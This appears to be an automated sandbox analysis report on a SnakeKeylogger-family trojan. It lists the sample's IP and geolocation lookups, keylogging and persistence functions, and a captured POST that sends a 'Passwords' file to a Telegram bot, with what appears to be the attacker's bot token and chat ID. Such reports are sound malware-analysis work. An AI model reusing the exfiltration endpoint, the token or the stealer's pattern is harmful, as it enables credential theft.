Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49693 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49697 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: c.pki.goog
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7955681740:AAHZKZS-0PYft7OYGzJTk9fIEe7ig9DCvoA/sendDocument?chat_id=7355061733&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7aeb060b31fbHost: api.telegram.orgContent-Length: 1083Connection: Keep-Alive

Source: InstallUtil.exe, 00000001.00000002.3796337957.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: InstallUtil.exe, 00000001.00000002.3796337957.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3796337957.000000000240B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3796337957.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000001.00000002.3796337957.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3796337957.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003559000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3793838344.00000000001CA000.00000040.00000400.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000003065000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002441000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002441000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3796337957.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000001.00000002.3796337957.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: InstallUtil.exe, 00000001.00000002.3796337957.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003559000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3793838344.00000000001CA000.00000040.00000400.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000003065000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: InstallUtil.exe, 00000005.00000002.3796598796.0000000002E33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7955681740:AAHZKZS-0PYft7OYGzJTk9fIEe7ig9DCvoA/sendDocument?chat_id=7355
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003559000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3793838344.00000000001CA000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000003065000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161d
Source: InstallUtil.exe, 00000001.00000002.3796337957.0000000002420000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3796598796.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161l
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Persist.exe, 00000004.00000002.1696484809.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.Persist.exe.2e87428.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.Persist.exe.2e87428.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.3793838344.00000000001CA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1686098094.0000000003065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1451286760.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1686098094.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe PID: 8632, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 8764, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Persist.exe PID: 9000, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_0171F1D8	0_2_0171F1D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_0171DAB8	0_2_0171DAB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_0171A160	0_2_0171A160
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_017197D8	0_2_017197D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_017197C8	0_2_017197C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_0639FA90	0_2_0639FA90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_0639E4F0	0_2_0639E4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_0639EA20	0_2_0639EA20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_06380007	0_2_06380007
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Code function: 0_2_06380040	0_2_06380040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_007380A8	1_2_007380A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_007354B0	1_2_007354B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0073C5C6	1_2_0073C5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0073A8DA	1_2_0073A8DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0073CCF0	1_2_0073CCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00732DD1	1_2_00732DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_007380A4	1_2_007380A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_007354AC	1_2_007354AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0073BC20	1_2_0073BC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0073BC1E	1_2_0073BC1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0073CCEE	1_2_0073CCEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049AEBE8	1_2_049AEBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A2728	1_2_049A2728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A0310	1_2_049A0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A030C	1_2_049A030C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A0998	1_2_049A0998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A1510	1_2_049A1510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A1500	1_2_049A1500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A1B99	1_2_049A1B99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_049A1BA8	1_2_049A1BA8
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_0130F1D8	4_2_0130F1D8
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_0130DAB8	4_2_0130DAB8
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_0130A160	4_2_0130A160
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_013097D8	4_2_013097D8
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_013097C8	4_2_013097C8
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_0616FA90	4_2_0616FA90
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_0616E4F0	4_2_0616E4F0
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_0616EA20	4_2_0616EA20
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_06150026	4_2_06150026
Source: C:\Users\user\AppData\Roaming\Persist.exe	Code function: 4_2_06150040	4_2_06150040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013DC168	5_2_013DC168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013DCA58	5_2_013DCA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013D4F08	5_2_013D4F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013D7E68	5_2_013D7E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013DB9E0	5_2_013DB9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013DB9D0	5_2_013DB9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013D2DD1	5_2_013D2DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013D7E5B	5_2_013D7E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 5_2_013D4EF8	5_2_013D4EF8

Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.00000000035EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461678108.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459924075.0000000005720000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameJrivbw.dll" vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.0000000004493000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJrivbw.dll" vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1459309358.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.00000000032E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1461796927.0000000005C20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1450071991.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000000.1331085318.0000000000CBA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIvwtiuoxk.exe4 vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe, 00000000.00000002.1451286760.0000000003352000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe
Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Binary or memory string: OriginalFilenameIvwtiuoxk.exe4 vs SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe

Source: SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Persist.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.340c340.0.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe.5c20000.12.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
